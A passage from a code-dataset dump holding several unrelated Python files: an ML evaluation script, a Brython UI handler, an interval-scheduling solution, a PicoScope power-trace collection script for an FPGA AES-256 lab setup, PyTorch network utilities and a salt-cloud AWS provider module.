FullyConnectedNetwork(num_steps=steps, learning_rate=rate)\n # train_loss, train_accuracy, valid_loss, valid_accuracy = fnc.learn()\n # np.savez('eval_%s.npz' % fnc.param_str(),\n # train_loss=train_loss, train_accuracy=train_accuracy,\n # valid_loss=valid_loss, valid_accuracy=valid_accuracy)\n for batch_size in batch_sizes:\n rate = 0.001\n fnc = FCNetworkMiniBatch(num_epoch=num_epoch, batch_size=batch_size,\n learning_rate=rate)\n train_loss, train_accuracy, valid_loss, valid_accuracy = fnc.learn()\n np.savez('mini/eval_%s.npz' % fnc.param_str(),\n train_loss=train_loss, train_accuracy=train_accuracy,\n valid_loss=valid_loss, valid_accuracy=valid_accuracy)\n\ndef collect_cnn_data():\n rate = 0.001\n num_epoch=1000\n batch_size=200\n\n train, test = load_data()\n X_train = np.reshape(train[0], [-1, 28, 28, 1])\n test = np.reshape(test, [-1, 28, 28, 1])\n\n cnn = CnnKeras((X_train, train[1]), test, num_epoch=num_epoch,\n batch_size=batch_size, learning_rate=rate)\n history = cnn.learn()\n cnn.save_weights()\n np.savez('cnn/eval_cnn_%s.npz' % cnn.param_str(),\n train_loss=history.losses, train_accuracy=history.accs,\n valid_loss=history.val_losses, valid_accuracy=history.val_accs)\n predictions = cnn.predict()\n\n predictions = np.argmax(predictions, axis=1)\n indexed = np.hstack([np.arange(1, len(predictions)+1)[:, None],\n predictions[:, None]])\n np.savetxt('cnn/predictions_%s.csv' % cnn.param_str(),\n indexed, fmt='%d', header='ImageId,Label', delimiter=',',\n comments='')\n\npredict = collect_cnn_data()\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433178398","text":"#\n# (c) 2017 elias/vanissoft\n#\n#\n#\n\nfrom browser import window, document\n\njq = window.jQuery\nModule_name = \"general\"\nWs_comm = None\n\nData = None\n\nclass datastore():\n\tdef __init__(self):\n\t\tself.data = {}\n\nData = datastore()\n\n\ndef message(dat):\n\tprint(\"message:\", dat)\n\tif 'error' in dat and dat['error']:\n\t\twindow.toastr.error(dat['message'], None,\n\t\t\t{\"debug\": 0, \"newestOnTop\": 1, \"positionClass\": \"toast-top-right\", \"closeButton\": 1, \"progressBar\": True})\n\telse:\n\t\twindow.toastr.info(dat['message'], None,\n\t\t\t{\"debug\": 0, \"newestOnTop\": 1, \"positionClass\": \"toast-top-right\", \"closeButton\": 1, \"progressBar\": True})\n\n\ndef incoming_data(data):\n\tprint(\"> general\", data)\n\tif 'master_unlock' in data:\n\t\tjq(\"#unlock_status\").removeClass(\"pe-7s-lock\")\n\t\tif not data['master_unlock']['error']:\n\t\t\tjq(\"#modal_master_password\").modal(\"hide\")\n\t\t\tdocument['MPerror'].innerHTML = \"\"\n\t\t\tjq(\"#unlock_status\").addClass(\"pe-7s-unlock\")\n\t\t\tData.data['master_unlocked'] = True\n\t\telse:\n\t\t\tdocument['MPerror'].innerHTML = data['master_unlock']['message']\n\t\t\tjq(\"#unlock_status\").addClass(\"pe-7s-lock\")\n\t\t\tData.data['master_unlocked'] = True\n\n\n","sub_path":"app/wmodgeneral.py","file_name":"wmodgeneral.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"408547062","text":"from sys import maxsize\nN = int(input())\narms = []\nfor i in range(N):\n x, l = map(int, input().split())\n arms.append((x-l, x+l))\n\narms.sort(key=lambda x: x[1])\n\nend = -maxsize\n\nres = 0\n\nfor arm in arms:\n if end <= arm[0]:\n res += 1\n end = arm[1]\nprint(res)\n","sub_path":"robot_arms.py","file_name":"robot_arms.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343601602","text":"# coding: utf-8\n\nimport time\nimport numpy as np\nimport subprocess\nimport PicoScope5244D as ps\nfrom subprocess import Popen, PIPE\nimport sys\nimport matplotlib.pyplot as plt\nimport ftd2xx\nimport pyvisa\nimport codecs\n\n#################################################################################\n############# Connect to FT2232H and Configure it to 245 Sync Fifo ##############\n#################################################################################\nd = ftd2xx.listDevices()\nh = ftd2xx.openEx(d[0])\nh.setBitMode(0xFF, 0x00) \t\t\t\t# reset mode\ntime.sleep(0.01)\nh.setBitMode(0xFF, 0x40)\t\t\t\t# 245 fifo mode\nh.setLatencyTimer(2)\n# h.setUSBParameters(0x10000,0x10000)\nh.setFlowControl(0x0100, 0x0, 0x0)\t\t# Avoid packet losses\nh.setTimeouts(200,200)\t\t\t\t\t# set RX/TX timeouts\nh.purge(1)\t\t\t\t\t\t\t\t#Purge RX Buffer\nh.purge(2)\nprint(\"FT223H configured\")\n\n\n#################################################################################\n############################ Configuration Picoscope ############################\n#################################################################################\n\npico = ps.PicoScope()\npico.setResolution(resolution='12bit')\npico.setChannel(channel='A',coupling_type='AC',voltage_range='200mV',probe=1) # Mesures\n#pico.setChannel(channel='B',coupling_type='DC',voltage_range='500mV',probe=1) # Trigger\npico.disableChannel(channel='B')\n\npico.setSimpleTrigger(channel='ext',threshold_mV=40,direction='rising',delay_samples=300,timeout_ms=3000) #300\npico.setSamplingParameters(preTrigger_ns=0,postTrigger_ns=2300,timebase=1) #800\nprint(\"Picoscope configured\")\nprint(pico.getSamplingParameters())\n\n#################################################################################\n################################ Load info files ################################\n#################################################################################\n\n# To know the file's name ('Nth_measurement') to collect traces\nwith open('../../Data/AES_256/FileForName.txt') as f:\n Nth_measurement = f.readlines();\n Nth_measurement = [x.strip() for x in Nth_measurement] # remove \\n at the end\n Nth_measurement = Nth_measurement[0]\n\n# To know the number of traces ('n_traces')\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\pt_fpga.txt') as f:\n plaintexts = f.readlines()\n plaintexts = [x.strip() for x in plaintexts] # remove \\n at the end\n nb_plaintexts = len(plaintexts)\n n_traces = nb_plaintexts\n\n# Functions to code and decode hex\nencode_hex = codecs.getencoder(\"hex_codec\")\ndecode_hex = codecs.getdecoder(\"hex_codec\")\n\n############# AES 256 INPUTS ###############\n############### Import key ##################\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\keys_unique.txt') as f:\n key_hex = f.readlines()\nkey_header_hex_msb = '00' + key_hex[0][0:32]\nkey_header_hex_lsb ='01' + key_hex[0][32:64]\nkey_string = decode_hex(key_header_hex_msb)[0] + decode_hex(key_header_hex_lsb)[0]\n# key_string représente la clé en hexa.\n# key_string commence par 00 pour 16 premiers bytes\n# key_string commence par 01 pour 16 derniers bytes\n\n############### Import mask ##################\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\masks_unique.txt') as f:\n mask_hex = f.readlines()\nmask_header_hex_msb = '02' + mask_hex[0][0:32]\nmask_header_hex_lsb ='03' + mask_hex[0][32:64]\nmask_string = decode_hex(mask_header_hex_msb)[0] + decode_hex(mask_header_hex_lsb)[0]\n\n################ Import plaintexts #################\nwith open('../../Data/AES_256/Measurement_'+str(Nth_measurement)+'\\pt_fpga.txt') as f:\n plaintexts = f.readlines()\nplaintexts = [x.strip() for x in plaintexts] # remove \\n at the end\nnb_plaintexts = len(plaintexts)\nn_traces = nb_plaintexts\n\npt_string = ['']*nb_plaintexts\ni=0\nfor x in plaintexts:\n pt_string[i] = decode_hex(x)[0]\n i = i + 1\n# pt_string représente les pltxts en hexa.\n# pt_string commence par 03 pour être reconnu comme pltxt.\n\n\n#################################################################################\n################################ Collect traces #################################\n#################################################################################\n\nprint(\"Send first mask \", mask_string, \" : \", h.write(mask_string))\nprint(\"Send first key \", key_string, \" : \", h.write(key_string))\nprint(\"Send first pltxt \", pt_string[0], \" : \", h.write(pt_string[0]))\nprint(\"First result : \", encode_hex(h.read(16))[0].decode('utf-8'))\nh.write(mask_string)\nh.write(key_string)\nh.write(pt_string[0])\nencode_hex(h.read(16))[0].decode('utf-8')\n\nciphertext = ['']*n_traces\ntrace_A = ['']*n_traces\npico.run()\ni=0\nprint(\"Starting...\")\nwhile i < n_traces:\n\n # Delay to stabilize the channels\n if i==0:\n print('Waiting stabilization of picoscope...')\n time.sleep(10)\n\n # Send and retrieve data\n h.write(pt_string[i])\n ciphertext[i] = encode_hex(h.read(16))[0].decode('utf-8')\n pico.waitForTrigger()\n trace_A[i] = pico.getChannelValues('A')\n\n # Save info of time\n if i == 1:\n samplingParameters = pico.getSamplingParameters()\n noSamples = samplingParameters['noSamples']\n samplingPeriod_ns = samplingParameters['samplingPeriod_ns']\n timeVector = np.linspace(0, noSamples * samplingPeriod_ns, noSamples)\n with open('../../Data/AES_256/Measurement_' + str(Nth_measurement) + '/time.txt', \"wt\") as f:\n for x in timeVector:\n f.write(str(x) + ' ')\n f.write('\\n')\n\n print(str(i + 1) + \"/\" + str(n_traces) + \" Capturing Traces ...\")\n i = i + 1\n\n pico.run()\n\n # Save traces in file\n if i == 1000:\n with open('../../Data/AES_256/Measurement_' + str(Nth_measurement) + '/traces.txt', \"wt\") as f:\n for x in trace_A:\n for elem in x:\n f.write(str(elem) + ' ')\n f.write('\\n')\n if i == n_traces:\n with open('../../Data/AES_256/Measurement_' + str(Nth_measurement) + '/traces.txt', \"wt\") as f:\n for x in trace_A:\n for elem in x:\n f.write(str(elem) + ' ')\n f.write('\\n')\n\n\npico.stop()\nprint(\"Success\")","sub_path":"Communication pico&sakura (Python)/Collect_traces/Collect_traces_Faking_implemented.py","file_name":"Collect_traces_Faking_implemented.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647536821","text":"from torch import nn\r\nimport torch.nn.functional as F\r\nimport torch\r\nfrom sync_batchnorm import SynchronizedBatchNorm2d as BatchNorm2d\r\nfrom sync_batchnorm import SynchronizedBatchNorm3d as BatchNorm3d\r\n\r\n\r\ndef kp2gaussian(kp: object, spatial_size: object, kp_variance: object) -> object:\r\n \"\"\"\r\n Transform a keypoint into gaussian like representation\r\n \"\"\"\r\n mean = kp['value']\r\n\r\n coordinate_grid = make_coordinate_grid(spatial_size, mean.type())\r\n number_of_leading_dimensions = len(mean.shape) - 1\r\n shape = (1,) * number_of_leading_dimensions + coordinate_grid.shape\r\n coordinate_grid = coordinate_grid.view(*shape)\r\n repeats = mean.shape[:number_of_leading_dimensions] + (1, 1, 1)\r\n coordinate_grid = coordinate_grid.repeat(*repeats)\r\n\r\n # Preprocess kp shape\r\n shape = mean.shape[:number_of_leading_dimensions] + (1, 1, 2)\r\n mean = mean.view(*shape)\r\n\r\n mean_sub = (coordinate_grid - mean)\r\n\r\n out = torch.exp(-0.5 * (mean_sub ** 2).sum(-1) / kp_variance)\r\n\r\n return out\r\n\r\n\r\ndef make_coordinate_grid(spatial_size, type):\r\n \"\"\"\r\n Create a meshgrid [-1,1] x [-1,1] of given spatial_size.\r\n \"\"\"\r\n h, w = spatial_size\r\n x = torch.arange(w).type(type)\r\n y = torch.arange(h).type(type)\r\n\r\n x = (2 * (x / (w - 1)) - 1)\r\n y = (2 * (y / (h - 1)) - 1)\r\n\r\n yy = y.view(-1, 1).repeat(1, w)\r\n xx = x.view(1, -1).repeat(h, 1)\r\n\r\n meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2)\r\n\r\n return meshed\r\n\r\n\r\ndef zip_dimT_to_dimBS(tensor):\r\n \"\"\"\r\n :param tensor: (N)D tensor: B, C, T, ...\r\n :return: tensor_: (N-1)D tensor: B * T, C, ...\r\n \"\"\"\r\n\r\n shape = tensor.shape\r\n tensor_ = tensor.transpose(1, 2).contiguous().view([shape[0] * shape[2], shape[1]] + list(shape[3:])).contiguous()\r\n return tensor_\r\n\r\n\r\ndef unzip_dimT_from_dimBS(num_frame, tensor):\r\n \"\"\"\r\n :param num_frame: number of dimT\r\n :param tensor: (N-1)D tensor: B * T, C, ...\r\n :return: tensor_: (N)D tensor: B, C, T, ...\r\n \"\"\"\r\n shape = tensor.shape\r\n tensor_ = tensor.view([-1, num_frame, shape[1]] + list(shape[2:])).contiguous().transpose(1, 2).contiguous()\r\n return tensor_\r\n\r\n\r\ndef SoftCrossEntropyLoss(inputs, target, temperature=0.1):\r\n log_likelihood = -F.log_softmax(inputs / temperature, dim=1)\r\n prob_target = F.softmax(target / temperature, dim=1)\r\n loss = torch.mul(log_likelihood, prob_target).sum(dim=1).mean()\r\n return loss\r\n\r\n\r\ndef MatrixEqualityLoss(inputs, target):\r\n eye_ = torch.matmul(inputs, torch.inverse(target))\r\n eye = torch.eye(2).view(1, 1, 2, 2).type(eye_.type())\r\n loss = torch.abs(eye - eye_).sum(dim=(1, 3, 4)).mean()\r\n\r\n return loss\r\n\r\n\r\nclass ResBlock3d(nn.Module):\r\n \"\"\"\r\n Res block, preserve spatial resolution.\r\n \"\"\"\r\n\r\n def __init__(self, in_features, kernel_size, padding):\r\n super(ResBlock3d, self).__init__()\r\n if isinstance(padding, int):\r\n padding = (padding, padding, padding)\r\n self.conv1 = nn.Sequential(\r\n nn.ReplicationPad3d((0, 0, 0, 0, padding[0], padding[0])),\r\n nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\r\n padding=(0, padding[1], padding[2]))\r\n )\r\n self.conv2 = nn.Sequential(\r\n nn.ReplicationPad3d((0, 0, 0, 0, padding[0], padding[0])),\r\n nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\r\n padding=(0, padding[1], padding[2]))\r\n )\r\n self.norm1 = BatchNorm3d(in_features, affine=True)\r\n self.norm2 = BatchNorm3d(in_features, affine=True)\r\n\r\n def forward(self, x):\r\n out = self.norm1(x)\r\n out = F.relu(out, inplace=True)\r\n out = self.conv1(out)\r\n out = self.norm2(out)\r\n out = F.relu(out, inplace=True)\r\n out = self.conv2(out)\r\n out += x\r\n return out\r\n\r\n\r\nclass UpBlock2d(nn.Module):\r\n \"\"\"\r\n Upsampling block for use in decoder(2D).\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\r\n super(UpBlock2d, self).__init__()\r\n\r\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\r\n padding=padding, groups=groups)\r\n self.norm = BatchNorm2d(out_features, affine=True)\r\n\r\n def forward(self, x):\r\n out = F.interpolate(x, scale_factor=2)\r\n out = self.conv(out)\r\n out = self.norm(out)\r\n out = F.relu(out, inplace=True)\r\n return out\r\n\r\n\r\nclass UpBlock3d(nn.Module):\r\n \"\"\"\r\n Upsampling block for use in decoder.\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\r\n super(UpBlock3d, self).__init__()\r\n\r\n if isinstance(padding, int):\r\n padding = (padding, padding, padding)\r\n self.conv = nn.Sequential(\r\n nn.ReplicationPad3d((0, 0, 0, 0, padding[0], padding[0])),\r\n nn.Conv3d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\r\n padding=(0, padding[1], padding[2]), groups=groups)\r\n )\r\n self.norm = BatchNorm3d(out_features, affine=True)\r\n\r\n def forward(self, x):\r\n shape = x.shape\r\n x = x.transpose(1, 2).contiguous().view([shape[0] * shape[2], shape[1]] + list(shape[3:]))\r\n out = F.interpolate(x, scale_factor=2)\r\n out = out.view([shape[0], shape[2], shape[1]] + list(out.shape[2:])).contiguous().transpose(1, 2)\r\n out = self.conv(out)\r\n out = self.norm(out)\r\n out = F.relu(out, inplace=True)\r\n return out\r\n\r\n\r\nclass DownBlock2d(nn.Module):\r\n \"\"\"\r\n Downsampling block for use in encoder(2D).\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\r\n super(DownBlock2d, self).__init__()\r\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\r\n padding=padding, groups=groups)\r\n self.norm = BatchNorm2d(out_features, affine=True)\r\n self.pool = nn.AvgPool2d(kernel_size=(2, 2))\r\n\r\n def forward(self, x):\r\n out = self.conv(x)\r\n out = self.norm(out)\r\n out = F.relu(out, inplace=True)\r\n out = self.pool(out)\r\n return out\r\n\r\n\r\nclass SameBlock2d(nn.Module):\r\n \"\"\"\r\n Simple block, preserve spatial resolution.\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, groups=1, kernel_size=3, padding=1):\r\n super(SameBlock2d, self).__init__()\r\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features,\r\n kernel_size=kernel_size, padding=padding, groups=groups)\r\n self.norm = BatchNorm2d(out_features, affine=True)\r\n\r\n def forward(self, x):\r\n out = self.conv(x)\r\n out = self.norm(out)\r\n out = F.relu(out)\r\n return out\r\n\r\n\r\nclass Decoder3d(nn.Module):\r\n \"\"\"\r\n Hourglass Decoder\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Decoder3d, self).__init__()\r\n\r\n up_blocks = []\r\n\r\n for i in range(num_blocks)[::-1]:\r\n in_filters = (1 if i == num_blocks - 1 else 2) * min(max_features, block_expansion * (2 ** (i + 1)))\r\n out_filters = min(max_features, block_expansion * (2 ** i))\r\n up_blocks.append(UpBlock3d(in_filters, out_filters, kernel_size=3, padding=1))\r\n\r\n self.up_blocks = nn.ModuleList(up_blocks)\r\n self.out_filters = block_expansion + in_features\r\n\r\n def forward(self, x):\r\n out = x.pop()\r\n for up_block in self.up_blocks:\r\n out = up_block(out)\r\n skip = x.pop()\r\n out = torch.cat([out, skip], dim=1)\r\n return out\r\n\r\n\r\nclass Encoder2d(nn.Module):\r\n \"\"\"\r\n Hourglass Encoder\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Encoder2d, self).__init__()\r\n\r\n down_blocks = []\r\n for i in range(num_blocks):\r\n down_blocks.append(DownBlock2d(in_features if i == 0 else min(max_features, block_expansion * (2 ** i)),\r\n min(max_features, block_expansion * (2 ** (i + 1))),\r\n kernel_size=3, padding=1))\r\n self.down_blocks = nn.ModuleList(down_blocks)\r\n\r\n def forward(self, x):\r\n outs = [x]\r\n for down_block in self.down_blocks:\r\n outs.append(down_block(outs[-1]))\r\n return outs\r\n\r\n\r\nclass Decoder2d(nn.Module):\r\n \"\"\"\r\n Hourglass Decoder\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Decoder2d, self).__init__()\r\n\r\n up_blocks = []\r\n\r\n for i in range(num_blocks)[::-1]:\r\n in_filters = (1 if i == num_blocks - 1 else 2) * min(max_features, block_expansion * (2 ** (i + 1)))\r\n out_filters = min(max_features, block_expansion * (2 ** i))\r\n up_blocks.append(UpBlock2d(in_filters, out_filters, kernel_size=3, padding=1))\r\n\r\n self.up_blocks = nn.ModuleList(up_blocks)\r\n self.out_filters = block_expansion + in_features\r\n\r\n def forward(self, x):\r\n out = x.pop()\r\n for up_block in self.up_blocks:\r\n out = up_block(out)\r\n skip = x.pop()\r\n out = torch.cat([out, skip], dim=1)\r\n return out\r\n\r\n\r\nclass Hourglass2d(nn.Module):\r\n \"\"\"\r\n Hourglass architecture.\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Hourglass2d, self).__init__()\r\n self.encoder = Encoder2d(block_expansion, in_features, num_blocks, max_features)\r\n self.decoder = Decoder2d(block_expansion, in_features, num_blocks, max_features)\r\n self.out_filters = self.decoder.out_filters\r\n\r\n def forward(self, x):\r\n return self.decoder(self.encoder(x))\r\n\r\n\r\nclass AntiAliasInterpolation2d(nn.Module):\r\n \"\"\"\r\n Band-limited downsampling, for better preservation of the input signal.\r\n \"\"\"\r\n def __init__(self, channels, scale):\r\n super(AntiAliasInterpolation2d, self).__init__()\r\n sigma = (1 / scale - 1) / 2\r\n kernel_size = 2 * round(sigma * 4) + 1\r\n self.ka = kernel_size // 2\r\n self.kb = self.ka - 1 if kernel_size % 2 == 0 else self.ka\r\n\r\n kernel_size = [kernel_size, kernel_size]\r\n sigma = [sigma, sigma]\r\n # The gaussian kernel is the product of the\r\n # gaussian function of each dimension.\r\n kernel = 1\r\n meshgrids = torch.meshgrid(\r\n [\r\n torch.arange(size, dtype=torch.float32)\r\n for size in kernel_size\r\n ]\r\n )\r\n for size, std, mgrid in zip(kernel_size, sigma, meshgrids):\r\n mean = (size - 1) / 2\r\n kernel *= torch.exp(-(mgrid - mean) ** 2 / (2 * std ** 2))\r\n\r\n # Make sure sum of values in gaussian kernel equals 1.\r\n kernel = kernel / torch.sum(kernel)\r\n # Reshape to depthwise convolutional weight\r\n kernel = kernel.view(1, 1, *kernel.size())\r\n kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))\r\n\r\n self.register_buffer('weight', kernel)\r\n self.groups = channels\r\n self.scale = scale\r\n\r\n def forward(self, input):\r\n if self.scale == 1.0:\r\n return input\r\n\r\n out = F.pad(input, (self.ka, self.kb, self.ka, self.kb))\r\n out = F.conv2d(out, weight=self.weight, groups=self.groups)\r\n out = F.interpolate(out, scale_factor=(self.scale, self.scale))\r\n\r\n return out\r\n","sub_path":"modules/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":11776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133879936","text":"'''\nThe AWS Cloud Module\n====================\n\nThe AWS cloud module is used to interact with the Amazon Web Services system.\n\nTo use the AWS cloud module the following configuration parameters need to be\nset in the main cloud config:\n\n.. code-block:: yaml\n\n # The AWS API authentication id\n AWS.id: GKTADJGHEIQSXMKKRBJ08H\n # The AWS API authentication key\n AWS.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs\n # The ssh keyname to use\n AWS.keyname: default\n # The amazon security group\n AWS.securitygroup: ssh_open\n # The location of the private key which corresponds to the keyname\n AWS.private_key: /root/default.pem\n\n'''\n\n# Import python libs\nimport os\nimport sys\nimport types\nimport time\nimport tempfile\nimport subprocess\nimport logging\n\n# Import libcloud\nfrom libcloud.compute.types import Provider\nfrom libcloud.compute.providers import get_driver\nfrom libcloud.compute.deployment import MultiStepDeployment, ScriptDeployment, SSHKeyDeployment\n\n# Import saltcloud libs\nimport saltcloud.utils\nfrom saltcloud.utils import namespaced_function\nfrom saltcloud.libcloudfuncs import *\n\n# Import salt libs\nfrom salt.exceptions import SaltException\n\n# Get logging started\nlog = logging.getLogger(__name__)\n\n# Init the libcloud functions\navail_images = namespaced_function(avail_images, globals())\navail_sizes = namespaced_function(avail_sizes, globals())\nscript = namespaced_function(script, globals())\ndestroy = namespaced_function(destroy, globals())\nlist_nodes = namespaced_function(list_nodes, globals())\nlist_nodes_full = namespaced_function(list_nodes_full, globals())\nlist_nodes_select = namespaced_function(list_nodes_select, globals())\n\n\n# Only load in this module if the AWS configurations are in place\ndef __virtual__():\n '''\n Set up the libcloud funcstions and check for AWS configs\n '''\n confs = [\n 'AWS.id',\n 'AWS.key',\n 'AWS.keyname',\n 'AWS.securitygroup',\n 'AWS.private_key',\n ]\n for conf in confs:\n if conf not in __opts__:\n return False\n log.debug('Loading AWS cloud module')\n return 'aws'\n\n\nEC2_LOCATIONS = {\n 'ap-northeast-1': Provider.EC2_AP_NORTHEAST,\n 'ap-southeast-1': Provider.EC2_AP_SOUTHEAST,\n 'eu-west-1': Provider.EC2_EU_WEST,\n 'sa-east-1': Provider.EC2_SA_EAST,\n 'us-east-1': Provider.EC2_US_EAST,\n 'us-west-1': Provider.EC2_US_WEST,\n 'us-west-2': Provider.EC2_US_WEST_OREGON\n}\nDEFAULT_LOCATION = 'us-east-1'\n\nif hasattr(Provider, 'EC2_AP_SOUTHEAST2'):\n EC2_LOCATIONS['ap-southeast-2'] = Provider.EC2_AP_SOUTHEAST2\n\n\ndef get_conn(**kwargs):\n '''\n Return a conn object for the passed VM data\n '''\n if 'location' in kwargs:\n location = kwargs['location']\n if location not in EC2_LOCATIONS:\n raise SaltException('The specified location does not seem to be valid: {0}\\n'.format(location))\n else:\n location = DEFAULT_LOCATION\n\n driver = get_driver(EC2_LOCATIONS[location])\n return driver(\n __opts__['AWS.id'],\n __opts__['AWS.key'],\n )\n\n\ndef keyname(vm_):\n '''\n Return the keyname\n '''\n return str(vm_.get('keyname', __opts__.get('AWS.keyname', '')))\n\n\ndef securitygroup(vm_):\n '''\n Return the security group\n '''\n return vm_.get('securitygroup', __opts__.get('AWS.securitygroup', 'default'))\n securitygroups = vm_.get('securitygroup', __opts__.get('AWS.securitygroup', 'default'))\n if not isinstance(securitygroups, list):\n securitygroup = securitygroups\n securitygroups = [securitygroup]\n return securitygroups\n\n\ndef ssh_username(vm_):\n '''\n Return the ssh_username. Defaults to 'ec2-user'.\n '''\n usernames = vm_.get('ssh_username', __opts__.get('AWS.ssh_username', 'ec2-user'))\n if not isinstance(usernames, list):\n username = usernames\n usernames = [username]\n if not 'ec2-user' in usernames:\n usernames.append('ec2-user')\n if not 'root' in usernames:\n usernames.append('root')\n return usernames\n\n\ndef ssh_interface(vm_):\n '''\n Return the ssh_interface type to connect to. Either 'public_ips' (default) or 'private_ips'.\n '''\n return vm_.get('ssh_interface', __opts__.get('AWS.ssh_interface', 'public_ips'))\n\n\ndef get_location(vm_):\n '''\n Return the AWS region to use\n '''\n return vm_.get('location', __opts__.get('AWS.location', DEFAULT_LOCATION))\n\n\ndef get_availability_zone(conn, vm_):\n '''\n Return the availability zone to use\n '''\n locations = conn.list_locations()\n az = None\n if 'availability_zone' in vm_:\n az = vm_['availability_zone']\n elif 'AWS.availability_zone' in __opts__:\n az = __opts__['AWS.availability_zone']\n\n if az is None:\n # Default to first zone\n return locations[0]\n for loc in locations:\n if loc.availability_zone.name == az:\n return loc\n\n\ndef create(vm_):\n '''\n Create a single VM from a data dict\n '''\n location = get_location(vm_)\n log.info('Creating Cloud VM {0} in {1}'.format(vm_['name'], location))\n conn = get_conn(location=location)\n usernames = ssh_username(vm_)\n kwargs = {'ssh_key': __opts__['AWS.private_key']}\n kwargs['name'] = vm_['name']\n deploy_script = script(vm_)\n kwargs['image'] = get_image(conn, vm_)\n kwargs['size'] = get_size(conn, vm_)\n kwargs['location'] = get_availability_zone(conn, vm_)\n ex_keyname = keyname(vm_)\n if ex_keyname:\n kwargs['ex_keyname'] = ex_keyname\n ex_securitygroup = securitygroup(vm_)\n if ex_securitygroup:\n kwargs['ex_securitygroup'] = ex_securitygroup\n try:\n data = conn.create_node(**kwargs)\n except Exception as exc:\n err = ('Error creating {0} on AWS\\n\\n'\n 'The following exception was thrown by libcloud when trying to '\n 'run the initial deployment: \\n{1}').format(\n vm_['name'], exc\n )\n sys.stderr.write(err)\n log.error(err)\n return False\n log.info('Created node {0}'.format(vm_['name']))\n waiting_for_ip = 0\n while not data.public_ips:\n time.sleep(0.5)\n waiting_for_ip += 1\n data = get_node(conn, vm_['name'])\n log.warn('Salt node waiting_for_ip {0}'.format(waiting_for_ip))\n if ssh_interface(vm_) == \"private_ips\":\n log.info('Salt node data. Private_ip: {0}'.format(data.private_ips[0]))\n ip_address = data.private_ips[0]\n else:\n log.info('Salt node data. Public_ip: {0}'.format(data.public_ips[0]))\n ip_address = data.public_ips[0]\n if saltcloud.utils.wait_for_ssh(ip_address):\n for user in usernames:\n if saltcloud.utils.wait_for_passwd(host=ip_address, username=user, timeout=60, key_filename=__opts__['AWS.private_key']):\n username = user\n break\n if __opts__['deploy'] is True:\n deploy_command = 'bash /tmp/deploy.sh'\n if username == 'root':\n deploy_command = '/tmp/deploy.sh'\n deployed = saltcloud.utils.deploy_script(\n host=ip_address,\n username=username,\n key_filename=__opts__['AWS.private_key'],\n deploy_command=deploy_command,\n tty=True,\n script=deploy_script.script,\n name=vm_['name'],\n sudo=True,\n start_action=__opts__['start_action'],\n conf_file=__opts__['conf_file'],\n sock_dir=__opts__['sock_dir'])\n if deployed:\n log.info('Salt installed on {0}'.format(vm_['name']))\n else:\n log.error('Failed to start Salt on Cloud VM {0}'.format(vm_['name']))\n\n log.info('Created Cloud VM {0} with the following values:'.format(vm_['name']))\n for key, val in data.__dict__.items():\n log.info(' {0}: {1}'.format(key, val))\n volumes = vm_.get('map_volumes')\n if volumes:\n log.info('Create and attach volumes to node {0}'.format(data.name))\n create_attach_volumes(volumes,location, data)\n\n\ndef create_attach_volumes(volumes, location, data):\n '''\n Create and attach volumes to created node\n '''\n conn = get_conn(location=location)\n node_avz = data.__dict__.get('extra').get('availability')\n for avz in conn.list_locations():\n if avz.availability_zone.name == node_avz:\n break\n for volume in volumes:\n volume_name = volume['device'] + \" on \" + data.name\n created_volume = conn.create_volume(volume['size'], volume_name, avz)\n attach = conn.attach_volume(data, created_volume, volume['device'])\n if attach:\n log.info('{0} attached to {1} (aka {2}) as device {3}'.format(created_volume.id, data.id, data.name, volume['device']))\n\n\ndef stop(name):\n '''\n Stop a node\n '''\n conn = get_conn()\n node = get_node(conn, name)\n try:\n data = conn.ex_stop_node(node=node)\n log.debug(data)\n log.info('Stopped node {0}'.format(name))\n except Exception as exc:\n log.error('Failed to stop node {0}'.format(name))\n log.error(exc)\n\n\ndef start(name):\n '''\n Start a node\n '''\n conn = get_conn()\n node = get_node(conn, name)\n try:\n data = conn.ex_start_node(node=node)\n log.debug(data)\n log.info('Started node {0}'.format(name))\n except Exception as exc:\n log.error('Failed to start node {0}'.format(name))\n log.error(exc)\n\n","sub_path":"saltcloud/clouds/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":9466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"634768045","text":"from django.urls import path\nfrom 